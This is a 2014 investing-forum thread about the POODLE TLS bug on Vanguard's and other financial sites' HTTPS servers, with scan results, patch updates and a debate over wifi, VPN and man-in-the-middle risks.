New HTTPS security bug, Vanguard servers vulnerable[Patched]

Discuss all general (i.e. non-personal) investing questions and issues, investing news, and theory.
Post Reply
Topic Author
cb474
Posts: 812
Joined: Tue Jan 19, 2010 6:32 am

New HTTPS security bug, Vanguard servers vulnerable[Patched]

Post by cb474 » Tue Dec 09, 2014 2:38 am

There's a new version of the Poodle security bug that effects encrypted web browser connections to Vanguard's servers: http://arstechnica.com/security/2014/12 ... -websites/.

I tested Vanguard's servers using Qualys SSL Labs and Vanguard got an "F" for being vulnerable to this bug: https://www.ssllabs.com/ssltest/analyze ... 75.192.200. (This link just shows the report for one of Vanguard's IP addresses, but if you want to run the test yourself, you'll see that they all fail in the same way.) [Edit: Just checked the url that you use to log onto your Vanguard account, investor.vanguard.com, and it fails the new TLS 1.2 bug in the same way: https://www.ssllabs.com/ssltest/analyze ... 75.202.116.]

The original Poodle bug effected the old SSLv3 mode of encrypted connections, which had a relatively easy fix for users, who could simply disable SSLv3 in their browser. The new bug effects TLS 1.2, however, which is pretty much the state of the art for HTTPS connections, so you can't just disable it, because then you couldn't make encrypted connections to servers at all. The only solution is for Vanguard to fix this at the server side.

I also noticed in the Qualys report that Vanguard's servers are still vulnerable to the original SSLv3 security bug, which is pretty astonishingly negligent. [Edit: However, the investor.vanguard.com url through which you log on to your account is not vulnerable to the SSLv3 bug, only to the new TLS 1.2 variant of the bug.] There are also a host of less than stellar security protocols that show up in the report on Vanguard's servers.

As far as I understand, the only way you can be subject to this attack is through a man in the middle attack, when you're connected to to a wifi hotspot or unsecured router. So never access your Vanguard account from a cafe or hotel or any public wifi (unless you're using a VPN) and make sure your home router uses WPA2 encryption (if you connect to your home router with WEP--as many people surprisingly still do--then there's a password to connect, but the connection itself in not encrypted and can be sniffed--and if you have no password on your home wifi, you're definitely not encrypted and vulnerable).

[Update, Thu Dec 11 19:11 PST 2014: As of this moment, only three of Vanguard's eight servers for logging into your account, appear to have had the TLS 1.2 security bug fixed. So unless you know which server you're connected to, the risk remains.]

[Upate, Fri Dec 12 02:02 PST 2014: All of Vanguard's servers at investor.vanguard.com appear to by updated now. Vanguard.com servers also look like they've been updated, including fixing the fact that they were still vulnerable to the original SSLv3 bug, which was just lame beyond measure.]
Last edited by cb474 on Sat Dec 13, 2014 5:54 am, edited 6 times in total.

User avatar
in_reality
Posts: 4529
Joined: Fri Jul 12, 2013 6:13 am

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by in_reality » Tue Dec 09, 2014 4:16 am

Schwab was reported as a "B" - not that I really know what that means...

Topic Author
cb474
Posts: 812
Joined: Tue Jan 19, 2010 6:32 am

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by cb474 » Tue Dec 09, 2014 4:25 am

in_reality wrote:Schwab was reported as a "B" - not that I really know what that means...
You can read the whole long report the site produces and see what it means. Then look up things you don't understand.

As far as this bug goes, you need to scroll down to near the bottom of the report and look for a line labeled "POODLE (TLS)" and it will tell you if the server is vulnerable to the Poodle attack over TLS connections (which is a version of how HTTPS connections work). For client.schwab.com, it looks like the server is not vulnerable to this bug.

User avatar
in_reality
Posts: 4529
Joined: Fri Jul 12, 2013 6:13 am

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by in_reality » Tue Dec 09, 2014 4:34 am

cb474 wrote:
in_reality wrote:Schwab was reported as a "B" - not that I really know what that means...
You can read the whole long report the site produces and see what it means. Then look up things you don't understand.
OK I got it. I had assumed clicking on the address link would take me to the site but it goes to the report!

The guide wasn't clear ... https://www.ssllabs.com/downloads/SSL_S ... _Guide.pdf

Topic Author
cb474
Posts: 812
Joined: Tue Jan 19, 2010 6:32 am

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by cb474 » Tue Dec 09, 2014 4:46 am

in_reality wrote:OK I got it. I had assumed clicking on the address link would take me to the site but it goes to the report!

The guide wasn't clear ... https://www.ssllabs.com/downloads/SSL_S ... _Guide.pdf
Ah, yes, you have to click on the address link.

I understand many of the technical things in the Qualys server tests, but I'm not an expert. I think you would just have to do online searches on the different sections and lines in the report to figure out what they're about.

A lot of it is about the different algorithms and encryption keys used by the server to create encrypted connections (e.g. are they using the strongest methods? weaker ones?). And a lot of the report is noting areas where servers will use stronger encryption methods, but also permit weaker methods for people connecting from old browsers and operating systems.

It is often considered better to simply not permit these connections at all, which would break the website for people with out of date software (which obviously from one perspective doesn't make a good impression on clients, who are not going to understand why things are failing), but which is more secure. In the end, this is mainly how the original Poodle bug affecting SSLv3 was delt with. Administrators decided enough is enough, this is super old technology, we're shutting it down.

And then some of the report is about whether the server is vulnerable to specific known bugs, like this new TLS 1.2 variant of the Poodle bug, the original SSLv3 Poodle bug, the famous Heartbleed bug, and so on.

User avatar
nisiprius
Advisory Board
Posts: 39750
Joined: Thu Jul 26, 2007 9:33 am
Location: The terrestrial, globular, planetary hunk of matter, flattened at the poles, is my abode.--O. Henry

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by nisiprius » Tue Dec 09, 2014 8:15 am

cb474 wrote:...if you connect to your home router with WEP--as many people surprisingly still do...
You mean it wasn't "wired equivalent" after all? :shock:
Annual income twenty pounds, annual expenditure nineteen nineteen and six, result happiness; Annual income twenty pounds, annual expenditure twenty pounds ought and six, result misery.

User avatar
telemark
Posts: 2571
Joined: Sat Aug 11, 2012 6:35 am

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by telemark » Tue Dec 09, 2014 10:11 am

Not doing anything important over public wifi networks is a good idea in any case. Seriously, you don't know where those things have been.

Sidney
Posts: 6736
Joined: Thu Mar 08, 2007 6:06 pm

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by Sidney » Tue Dec 09, 2014 11:22 am

telemark wrote:Not doing anything important over public wifi networks is a good idea in any case. Seriously, you don't know where those things have been.
What, you've never been enjoying a cool one and had the sudden urge to re-balance? :beer
I always wanted to be a procrastinator.

KyleAAA
Posts: 7751
Joined: Wed Jul 01, 2009 5:35 pm
Contact:

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by KyleAAA » Tue Dec 09, 2014 11:43 am

cb474 wrote:
As far as I understand, the only way you can be subject to this attack is through a man in the middle attack, when you're connected to to a wifi hotspot or unsecured router. So never access your Vanguard account from a cafe or hotel or any public wifi (unless you're using a VPN) and make sure your home router uses WPA2 encryption (if you connect to your home router with WEP--as many people surprisingly still do--then there's a password to connect, but the connection itself in not encrypted and can be sniffed--and if you have no password on your home wifi, you're definitely not encrypted and vulnerable).
+100,000,000,000

Just this alone makes such a huge difference. It's safe to assume that if you're on public wifi or if your home wifi isn't encrypted, somebody almost certainly IS listening in.

Ninegrams
Posts: 557
Joined: Sun Aug 17, 2014 6:12 pm

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by Ninegrams » Tue Dec 09, 2014 11:52 am

cb474 wrote:There's a new version of the Poodle security bug that effects encrypted web browser connections to Vanguard's servers: http://arstechnica.com/security/2014/12 ... -websites/.

I tested Vanguard's servers using Qualys SSL Labs and Vanguard got an "F" for being vulnerable to this bug: https://www.ssllabs.com/ssltest/analyze ... 75.192.200. (This link just shows the report for one of Vanguard's IP addresses, but if you want to run the test yourself, you'll see that they all fail in the same way.) [Edit: Just checked the url that you use to log onto your Vanguard account, investor.vanguard.com, and it fails the new TLS 1.2 bug in the same way: https://www.ssllabs.com/ssltest/analyze ... 75.202.116.]

The original Poodle bug effected the old SSLv3 mode of encrypted connections, which had a relatively easy fix for users, who could simply disable SSLv3 in their browser. The new bug effects TLS 1.2, however, which is pretty much the state of the art for HTTPS connections, so you can't just disable it, because then you couldn't make encrypted connections to servers at all. The only solution is for Vanguard to fix this at the server side.

I also noticed in the Qualys report that Vanguard's servers are still vulnerable to the original SSLv3 security bug, which is pretty astonishingly negligent. [Edit: However, the investor.vanguard.com url through which you log on to your account is not vulnerable to the SSLv3 bug, only to the new TLS 1.2 variant of the bug.] There are also a host of less than stellar security protocols that show up in the report on Vanguard's servers.

As far as I understand, the only way you can be subject to this attack is through a man in the middle attack, when you're connected to to a wifi hotspot or unsecured router. So never access your Vanguard account from a cafe or hotel or any public wifi (unless you're using a VPN) and make sure your home router uses WPA2 encryption (if you connect to your home router with WEP--as many people surprisingly still do--then there's a password to connect, but the connection itself in not encrypted and can be sniffed--and if you have no password on your home wifi, you're definitely not encrypted and vulnerable).
Most home routers have at least one ethernet port, so using that instead of wifi would be about as safe as you can get. I would bet most users are clueless about WEP, WPA2... and why shouldn't they be, the manufactures putting out garbage routers with gaping security flaws aren't any better.

User avatar
kenyan
Posts: 2986
Joined: Thu Jan 13, 2011 12:16 am

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by kenyan » Tue Dec 09, 2014 12:04 pm

I only do any financial transactions or logins from my Home or Work desktops. Home network does have Wifi, but not on the desktop. Wi-Fi is WPA2-encrypted, with a non-broadcasting SSID.

Interesting note - I recently signed up for the two-factor authentication offered by Vanguard, and have since been getting regular text messages due to overnight login attempts on both my and my wife's accounts. A bit unsettling, I must say. I will have to work on making our IDs a bit more cryptic (can't change them online, apparently).
Retirement investing is a marathon.

apados
Posts: 25
Joined: Thu Jul 04, 2013 1:10 pm

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by apados » Tue Dec 09, 2014 12:27 pm

kenyan wrote:Interesting note - I recently signed up for the two-factor authentication offered by Vanguard, and have since been getting regular text messages due to overnight login attempts on both my and my wife's accounts. A bit unsettling, I must say. I will have to work on making our IDs a bit more cryptic (can't change them online, apparently).

If you use any aggregation sites it will attempt to login (e.g. mint.com etc.) and result in a text message requesting authentication.

floatingdoc
Posts: 147
Joined: Sun Jan 03, 2010 2:13 pm

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by floatingdoc » Tue Dec 09, 2014 12:50 pm

Kenyan,

As it says on the site, make sure you are not using quicken or mint otherwise those services might be trying to access data and causing those texts

Ninegrams
Posts: 557
Joined: Sun Aug 17, 2014 6:12 pm

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by Ninegrams » Tue Dec 09, 2014 7:50 pm

kenyan wrote:I only do any financial transactions or logins from my Home or Work desktops. Home network does have Wifi, but not on the desktop. Wi-Fi is WPA2-encrypted, with a non-broadcasting SSID.

Interesting note - I recently signed up for the two-factor authentication offered by Vanguard, and have since been getting regular text messages due to overnight login attempts on both my and my wife's accounts. A bit unsettling, I must say. I will have to work on making our IDs a bit more cryptic (can't change them online, apparently).

Hiding your SSID doesn't make you any safer:

http://www.howtogeek.com/howto/28653/de ... re-secure/

killjoy2012
Posts: 1094
Joined: Wed Sep 26, 2012 5:30 pm

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by killjoy2012 » Tue Dec 09, 2014 9:31 pm

Funny how you guys either implicitly trust, or are overlooking, the insecurity or proper trust level of your ISP and every other router owner between your house and where Vanguard's servers are.

Ninegrams
Posts: 557
Joined: Sun Aug 17, 2014 6:12 pm

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by Ninegrams » Tue Dec 09, 2014 11:42 pm

killjoy2012 wrote:Funny how you guys either implicitly trust, or are overlooking, the insecurity or proper trust level of your ISP and every other router owner between your house and where Vanguard's servers are.
Not sure what your point is. One can only control what one can control and unless you have a private and direct line to your financial institution( is it trustworthy??), how do you get around your packets going through ISP's and all the anonymous router hops in between? There is no good solution to this problem ( security arms race ) on the horizon. The internet was not designed with security as a top priority due to it's origins ( a relatively closed quasi government system ). If you want 100% ( or as close as you can get to that ) security don't use the internet.

User avatar
patriciamgr2
Posts: 800
Joined: Mon Nov 19, 2007 3:06 pm

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by patriciamgr2 » Wed Dec 10, 2014 12:09 am

To Kenyan & others reporting log-in attempts thwarted by 2FA:

would you please let us know if you're using an aggregation service (quicken, mint, etc). If not, we all need to be concerned. My userid is random letters & digits (which I do recall changing online but maybe they've changed that)--but that won't stop someone testing combinations (vanguard's aren't very long).

Any data would be helpful for the rest of us, Thanks.

Mudpuppy
Posts: 5890
Joined: Sat Aug 27, 2011 2:26 am
Location: Sunny California

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by Mudpuppy » Wed Dec 10, 2014 2:23 am

cb474 wrote:(if you connect to your home router with WEP--as many people surprisingly still do--then there's a password to connect, but the connection itself in not encrypted and can be sniffed--and if you have no password on your home wifi, you're definitely not encrypted and vulnerable).
Just an FYI, WEP does have encryption, it's just such poor a encryption scheme that it can be trivially broken by observing the encrypted traffic. After observing enough traffic, one can recover the key. Once the attacker has the key, everything can be decrypted. So it's the equivalent of an unencrypted link from a practical perspective, but I find it important to point out just how horrible the encryption scheme is, if only to hope that future developers remember this mistake (and similar mistakes with WPS) and don't make it again. Perhaps a vain hope, but a hope to have nonetheless.
killjoy2012 wrote:Funny how you guys either implicitly trust, or are overlooking, the insecurity or proper trust level of your ISP and every other router owner between your house and where Vanguard's servers are.
It's possible that routers on the IP subnet could be malicious, but that's the point of using strong encryption schemes: to make it difficult for those routers to be able to recover anything. At some point, you have to trust something or you can just go for the safest computer in the world: unplugged, turned off, and stored in the closet.

Topic Author
cb474
Posts: 812
Joined: Tue Jan 19, 2010 6:32 am

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by cb474 » Wed Dec 10, 2014 3:30 am

Mudpuppy wrote:Just an FYI, WEP does have encryption, it's just such poor a encryption scheme that it can be trivially broken by observing the encrypted traffic. After observing enough traffic, one can recover the key. Once the attacker has the key, everything can be decrypted. So it's the equivalent of an unencrypted link from a practical perspective, but I find it important to point out just how horrible the encryption scheme is, if only to hope that future developers remember this mistake (and similar mistakes with WPS) and don't make it again. Perhaps a vain hope, but a hope to have nonetheless.
Thanks for the clarification.

geekpryde
Posts: 92
Joined: Mon Jun 01, 2009 2:37 pm

Vanguard site Very Vulnerable to ‘Poodle’ Bug

Post by geekpryde » Thu Dec 11, 2014 1:53 pm

[Thread merged, see below. --admin LadyGeek]

I don't like seeing Vanguard in a negative light when I make my normal daily blog rounds, but it occasionally happens:
A cursory review using Qualys’s SSL/TLS scanning tool indicates that the Web sites for some of the world’s largest financial institutions are vulnerable to the new POODLE bug, including Bank of America, Chase.com, Citibank, HSBC, Suntrust — as well as retirement and investment giants Fidelity.com and Vanguard
Krebs on Security is a widely respected security blog written by Brian Krebs. I recommend the blog, and specifically this entry about banks and Vanguard.

From Krebs:

http://krebsonsecurity.com/2014/12/pood ... ank-sites/

Image


https://www.ssllabs.com/ssltest/

killjoy2012
Posts: 1094
Joined: Wed Sep 26, 2012 5:30 pm

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by killjoy2012 » Thu Dec 11, 2014 4:09 pm

Ninegrams wrote: Not sure what your point is.
My point was that this thread is overflowing with wifi security talk, when it's much more likely the bad guys would execute such an attack at an ISP or Internet core routing point. I highly doubt a Russian cyber crime perpetrator is going to fly to your house, sit in your bushes sniffing your somewhat insecure wifi while you sleep, then crack the WPA/WEP key and then POODLE you. It *may* be more plausible that they'd go after a hotel chain whose hotel Internet access is aggregated at a common proxy infrastructure - but again, not at the wifi AP level (too much work, not enough payback).

If you're that worried about the perceived insecurity of wifi, then use a private or public VPN service.

For Poodle, it would be much more effective for them to hack into a vulnerable or not properly secured ISP router, inject a new route to send Internet traffic through their router/proxy server, where they can then use multiple man in the middle attacks - including Poodle - at hundreds or thousands of people, with little-to-no cost.

TL;DR - The right answer is that Vanguard should update their website.

Ninegrams
Posts: 557
Joined: Sun Aug 17, 2014 6:12 pm

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by Ninegrams » Thu Dec 11, 2014 7:54 pm

killjoy2012 wrote:
Ninegrams wrote: Not sure what your point is.
My point was that this thread is overflowing with wifi security talk, when it's much more likely the bad guys would execute such an attack at an ISP or Internet core routing point. I highly doubt a Russian cyber crime perpetrator is going to fly to your house, sit in your bushes sniffing your somewhat insecure wifi while you sleep, then crack the WPA/WEP key and then POODLE you. It *may* be more plausible that they'd go after a hotel chain whose hotel Internet access is aggregated at a common proxy infrastructure - but again, not at the wifi AP level (too much work, not enough payback).

If you're that worried about the perceived insecurity of wifi, then use a private or public VPN service.

For Poodle, it would be much more effective for them to hack into a vulnerable or not properly secured ISP router, inject a new route to send Internet traffic through their router/proxy server, where they can then use multiple man in the middle attacks - including Poodle - at hundreds or thousands of people, with little-to-no cost.

TL;DR - The right answer is that Vanguard should update their website.
And my point is you can only control those things you have the means to control. Even if we wanted to, you or I can't manage Vanguards website or any of the other entities in between ourselves and Vanguard. We can ONLY manage our end of the chain. Now if your saying that it's pointless to manage our end given the other risks, then your of course fine to do that for yourself, others may feel differently. Your Russian hacker hypothetical is meaningless to this discussion about wifi, and your ignoring the risk of a drive-by attack ( which is a greater than zero risk ). The other risks risks you mention, may indeed be more likely but short of not using the internet ( or not using public Wi-fi for financial transactions ) what can you do about them? Nothing. Personally I'm not worried about wi-fi security in the least because I don't use it for systems that I conduct financial transactions on.

One more reason to be as secure as possible with your personal end of the transaction,is in the event your system/transaction is compromised, getting reimbursed by the financial entity in a timely fashion(if at all ) is vastly more likely if you've done all you could to secure "your end".

Topic Author
cb474
Posts: 812
Joined: Tue Jan 19, 2010 6:32 am

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by cb474 » Thu Dec 11, 2014 9:58 pm

killjoy2012 wrote:
Ninegrams wrote: Not sure what your point is.
My point was that this thread is overflowing with wifi security talk, when it's much more likely the bad guys would execute such an attack at an ISP or Internet core routing point. I highly doubt a Russian cyber crime perpetrator is going to fly to your house, sit in your bushes sniffing your somewhat insecure wifi while you sleep, then crack the WPA/WEP key and then POODLE you. It *may* be more plausible that they'd go after a hotel chain whose hotel Internet access is aggregated at a common proxy infrastructure - but again, not at the wifi AP level (too much work, not enough payback).

If you're that worried about the perceived insecurity of wifi, then use a private or public VPN service.

For Poodle, it would be much more effective for them to hack into a vulnerable or not properly secured ISP router, inject a new route to send Internet traffic through their router/proxy server, where they can then use multiple man in the middle attacks - including Poodle - at hundreds or thousands of people, with little-to-no cost.

TL;DR - The right answer is that Vanguard should update their website.
Eavedropping on public wifi is actually fairly common. Man in the middle attacks are not unheard of. What's more many public wifi spots have their own man in the middle, as it were, monitoring and passing on traffic routed through them, for marketing, business purposes, etc. Since the IT people who set this stuff up often do a mediocre job with security, it is also possible to remotely exploit bugs in router firmware and take them over to remotely deploy man in the middle attacks (this is what happened with Home Depot, Target, having their point of sale devices hacked). So in fact, your proverbial Russian mobsters need not fly to America to exploit these bugs in public wifi and you are vastly underestimating the risk.

On top of that, there is a whole sub-culture of so called War Driving, wherein people drive around looking for wifi routers to sniff, break into, etc. So in fact, the risk to one's home router, while small, is real. And I'm sure if someone figured out a security bug in the firmware of popular routers issued by a common ISP, like Comcast, AT&T, etc., someone would be happy to write malicious code to crawl the web looking for these routers and exploiting the bug. You seem to think that some Russian mobsters would have to sit there invidually targeting you. But that's not how it works. People create malware that propogrates itself through the web searching for machines with known bugs, including devices like routers.

In any case, obviously the solution to this particular TLS. 1.2 bug, as far as connecting to Vanguard's website goes, is for Vanguard to fix it on the server side. I said that in the OP, so I don't know why you feel you're making some point by repeating what is obvious and has already been said.

(By the way, at the time of this posting Vanguard appears to only have fixed the problem on three of their eight servers--so if you don't know which server you're connecting to, you could still be at risk.)

But there's nothing wrong with using the occasion to remind people of best practices, as far as their own computer security goes, in public and for their home routers. Since most people have very bad security pratices, the point needs to be repeated a lot. Why you would be against educating people about computer security is beyond me.

Further, as Ninegrams notes, it is patently obvious that we as individuals have no control over the the intra-network routers of our ISPs and the backbone of the internet. So you protect yourself where you can. You eliminate security risk as much as you can, but of course it's never perfect.

I also think that the routers in the backbone of our ISPs and the internet in general are in fact some of the few things that have a lot of security around them, managed by people who know what they're doing. The idea that Russian mobsters are going to compromise these devices is far more fantastic and science fiction, than the idea that your home router might get compromised. Indeed, one of the things we learned from the Snowden leaks is that the NSA has exploited some of these backbone resources to compromise things like the TOR anonymizing network, but only because they had the legal authority to acquire physical access to the routers and servers, which only the NSA could do. The security risks that only the NSA could pull off are really not the sort of problem most people need to worry about and far beyond what your proverbial Russian mobsters could do.

So I think you have misconstrued the risks entirely and the real benefits of people being more careful both about how they use public wifi and how they configure their home routers. These aren't trivial things and they are entirely a separate issue from Vanguard's server security or backbone internet structures, not in opposition to those security concerns.

ThankYouJack
Posts: 3088
Joined: Wed Oct 08, 2014 7:27 pm

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by ThankYouJack » Thu Dec 11, 2014 10:08 pm

cb474 wrote:
As far as I understand, the only way you can be subject to this attack is through a man in the middle attack, when you're connected to to a wifi hotspot or unsecured router. So never access your Vanguard account from a cafe or hotel or any public wifi (unless you're using a VPN) .
Even if you use a VPN that doesn't mean that data from your computer to vanguard.com will go through the VPN. It depends on the configuration of the VPN, right?

Topic Author
cb474
Posts: 812
Joined: Tue Jan 19, 2010 6:32 am

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by cb474 » Thu Dec 11, 2014 10:43 pm

ThankYouJack wrote:
cb474 wrote:
As far as I understand, the only way you can be subject to this attack is through a man in the middle attack, when you're connected to to a wifi hotspot or unsecured router. So never access your Vanguard account from a cafe or hotel or any public wifi (unless you're using a VPN) .
Even if you use a VPN that doesn't mean that data from your computer to vanguard.com will go through the VPN. It depends on the configuration of the VPN, right?
If you've configured the VPN correctly all data on your computer should go through an encrypted tunnel to the VPN, before heading to Vanguard's servers. So it's not that the veritable man in the middle would not see your traffic, it's just that it would be encrypted and unreadable for them.

(A proxy is different, though. A proxy is just a server that sits between you and whatever website or server you're connecting to. It masks your IP address from whoever you're connecting to, but does not necessarily encrypt your traffic to protect it between your computer and the proxy server--thereby securing it from routers, your ISP, and anything your traffic goes through before it reaches the proxy server. Usually a proxy connection is also set up within a particular program, like a web browser, not as a mechanism for routing all internet traffic from a device. So it's really mostly about masking your IP address and a minimal level of privacy and doesn't do much, if anything, for security.)

It is possible, of course, when connected to a VPN service, that the connection to the VPN server will drop for some reason (maybe the VPN disconnects you or has a glitch or whatever) and then your traffic will just start routing normally through whatever router and ISP you're connected to.

But a good VPN service will either have software that you run with the service that alerts you when the VPN connection has dropped or (better I think) instruct you how to set up firewall rules on your computer so that the computer itself will only route internet traffic through the VPN. That way, if the VPN connection drops, then you just lose internet service entirely. You could then manually reconfigure the firewall if you need to.

I would check with your VPN service, if you're using one, about how to be sure that your traffic is always going through them or that you're aware when the connection drops. If they can't help you with this or don't take it seriously enough, find another VPN service.

Also, you really want to use a VPN service that allows you to connect with the OpenVPN protocol. PPTP, which is a Microsoft technology, has known vulnerabilities and is complete garbage. LT2P/IPSEC is supposed to be pretty good, but most security concious people consider OpenVPN to be the best.

(From what I've read--and I researched this a lot--amongst hyper security and privacy conscious people two of the best options are PrivateInternetAccess and iVPN. PrivateInternetAccess has good prices and are very serious about their users' privacy; the principal administrators of the system relocated outside the U.S. so that they would not be subject to U.S. court orders--sercret national security letters, etc.; but PrivateInternetAccess is still located in the U.S., so that has it's pluses and minuses. iVPN is more expensive, but probably as good as it gets; they use two hop servers and are located and operated entirely outside the U.S.--though they have U.S. based servers, amongst other countires, depending on your needs; they are also associated with the Electronic Freedom Foundation, which I think is a very high mark of approval. Be wary, because most of the VPN services out there are relatively fly by night or don't really take your privacy that seriously. There have been some scandals.)
Last edited by cb474 on Thu Dec 11, 2014 11:10 pm, edited 2 times in total.

Mudpuppy
Posts: 5890
Joined: Sat Aug 27, 2011 2:26 am
Location: Sunny California

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by Mudpuppy » Thu Dec 11, 2014 10:58 pm

killjoy2012 wrote:My point was that this thread is overflowing with wifi security talk, when it's much more likely the bad guys would execute such an attack at an ISP or Internet core routing point. I highly doubt a Russian cyber crime perpetrator is going to fly to your house, sit in your bushes sniffing your somewhat insecure wifi while you sleep, then crack the WPA/WEP key and then POODLE you. It *may* be more plausible that they'd go after a hotel chain whose hotel Internet access is aggregated at a common proxy infrastructure - but again, not at the wifi AP level (too much work, not enough payback).

If you're that worried about the perceived insecurity of wifi, then use a private or public VPN service.

For Poodle, it would be much more effective for them to hack into a vulnerable or not properly secured ISP router, inject a new route to send Internet traffic through their router/proxy server, where they can then use multiple man in the middle attacks - including Poodle - at hundreds or thousands of people, with little-to-no cost.

TL;DR - The right answer is that Vanguard should update their website.
You underestimate the literal manpower the cyber criminal organizations have at their disposal. If they can manage to get a few hundred people to go act as cash mules when they skim some ATM numbers and PINs, then they can manage to get a few hundred people to go sit in high traffic areas in major metropolitan areas to snarf up whatever tasty morsels are floating by on WiFi. You just have to have them download a bootable USB or live CD and sit there, with little to no knowledge of how the attack actually works. They just have to be able to boot up off the USB/CD and click a few buttons to launch fully automated tools.

It is far more difficult and requires far more knowledge to hack into the core routers and the IP subnet. There are safeguards in place to prevent routing hijacking and that part of the infrastructure gets a little more attention than your average network. Yes, it would be a remote attack and it would have a bigger "return" on the virtual "investment", but why bother with robbing the bank, so to speak, when you can just have some mules siphon off bits and pieces here and there that collectively adds up to a tasty haul.

Topic Author
cb474
Posts: 812
Joined: Tue Jan 19, 2010 6:32 am

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by cb474 » Thu Dec 11, 2014 11:21 pm

Mudpuppy wrote:It is far more difficult and requires far more knowledge to hack into the core routers and the IP subnet. There are safeguards in place to prevent routing hijacking and that part of the infrastructure gets a little more attention than your average network. Yes, it would be a remote attack and it would have a bigger "return" on the virtual "investment", but why bother with robbing the bank, so to speak, when you can just have some mules siphon off bits and pieces here and there that collectively adds up to a tasty haul.
Yes, and if it does get discovered, probably no one is going to investigate it very seriously. Whereas if someone manages to worm their way into the internet backbone (which I still doubt is possible for anyone other than the NSA, GCHQ, and other major state sponsored entities), you can bet that the FBI and lots of heavy duty powers are going to be all over it.

So it's not just that it's harder to get into the backbone, if possible at all, it's that the risk for a criminal just looking to make money is huge. Whereas ripping off mom and pop usually goes entirely unpunished and that's why they are such a juicey target. Go after the low hanging fruit, I think that's where most crime is at. The super sophisticated attacks are for the world of espionage, not mobsters. At the most, sophisticated criminals go after businesses (Target, Home Depot) not the internet backbone (and even in the case of Target and Home Depot that only worked because the point of sale terminals were so ridiculously insecure and Target and Home Depot did such a terrible job with their own IT).

User avatar
Ged
Posts: 3839
Joined: Mon May 13, 2013 1:48 pm
Location: Roke

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by Ged » Thu Dec 11, 2014 11:35 pm

Well I checked Fidelity using the above site and they also get an F due to the new Poodle vulnerability. Apparently many many financial institutions have this problem.

From what I understand about this is that it's often not just a matter of patching a web server - the components that often show this problem are load balancers. While some vendors have patched their firmware it could be that there is stuff out there that may have a real lead time to fix because it's physical, say like an ASIC.

Just another reason to not access anything important over public wifi.

User avatar
jwillis77373
Posts: 395
Joined: Mon Jun 25, 2007 9:52 pm
Location: Texas

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by jwillis77373 » Thu Dec 11, 2014 11:38 pm

Vanguard carries out most transactions with a settlement date and a generous amount of "out of bandwidth" communications to confirm a trade and follow up.

Even if it is vulnerable, the risk is mitigated by the proactive trade confirmations by email, which also provide information for canceling or freezing your account.

Enable but "don't trust any transaction" is final until "after" the settlement date seems to be the standard mode of operation.

killjoy2012
Posts: 1094
Joined: Wed Sep 26, 2012 5:30 pm

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by killjoy2012 » Fri Dec 12, 2014 1:27 am

Ninegrams wrote: Now if your saying that it's pointless to manage our end given the other risks, then your of course fine to do that for yourself, others may feel differently.
I never said that. The OP's post is making people aware of the latest Poodle TLS vulnerability - good stuff, nice job. Then I see many subsequent comments related to making sure you secure your home wireless router to somehow magically protect you against Poodle and other MitM attacks. Such as:
cb474 wrote:if you connect to your home router with WEP--as many people surprisingly still do--
Ninegrams wrote:Most home routers have at least one ethernet port, so using that instead of wifi would be about as safe as you can get.
kenyan wrote: Home network does have Wifi, but not on the desktop. Wi-Fi is WPA2-encrypted, with a non-broadcasting SSID.
Ninegrams wrote:Hiding your SSID doesn't make you any safer:
Do you think upgrading your home router's wireless security from WPA to WPA2 AES PSK is suddenly going to lower your personal risk of falling victim to a Poodle TLS attack by some significant percentage? Any percentage? Sure, you should be running WPA2 at home - no doubt - I'm not saying otherwise - I just don't understand what it has to do with lowering your Poodle TLS risk.

Listen - you're 1,000,000,000x more likely to browse to a website that's hosting malicious content (BTW, often unbeknownst to the website owner), be it through a poison well attack or phish, and as a result have your browser hijacked, malware installed and/or proxy settings simply configured to point to the bad guys infrastructure (often covertly) -- all of which would allow various cyber crime actors to easily perpetrate a Poodle sslv3 or TLS attack completely remote -- All of which, IMO, is much more probable than a rogue actor physically traveling to your house/street - or 1,000 homes/streets, sniffing WEP/WPA traffic, cracking keys, setting up MitM infrastructure in their car, somehow inserting their tool into your SSL session, etc. If you think otherwise, I don't know what to tell you.
cb474 wrote:Since the IT people who set this stuff up often do a mediocre job with security, it is also possible to remotely exploit bugs in router firmware and take them over to remotely deploy man in the middle attacks
cb474 wrote:I also think that the routers in the backbone of our ISPs and the internet in general are in fact some of the few things that have a lot of security around them, managed by people who know what they're doing.
So, which is it? It's the same "IT guys" building and operating these devices. And if you think Cisco/Juniper commercial routers are somehow these super secure devices that rarely have any vulnerabilities or default passwords/configs - go spend some time on Shodan.
cb474 wrote:But there's nothing wrong with using the occasion to remind people of best practices, as far as their own computer security goes, in public and for their home routers. Since most people have very bad security pratices, the point needs to be repeated a lot. Why you would be against educating people about computer security is beyond me.
Agree. I'm not against fostering cyber security awareness, quite the opposite, and I don't know why you think my first reply was somehow slamming your original post OP (and now needing to defend). I just don't see what home wifi security really has much to do with Poodle TLS. e.g. If you started a new post with "Hey, FYI, there's this new SSL vulnerability called Poodle TLS out there -- be careful." and I reply with all 615 pages of:

- NIST 800-53 - Security and Privacy Controls for Federal Information Systems and Organizations - http://nvlpubs.nist.gov/nistpubs/Specia ... 0-53r4.pdf
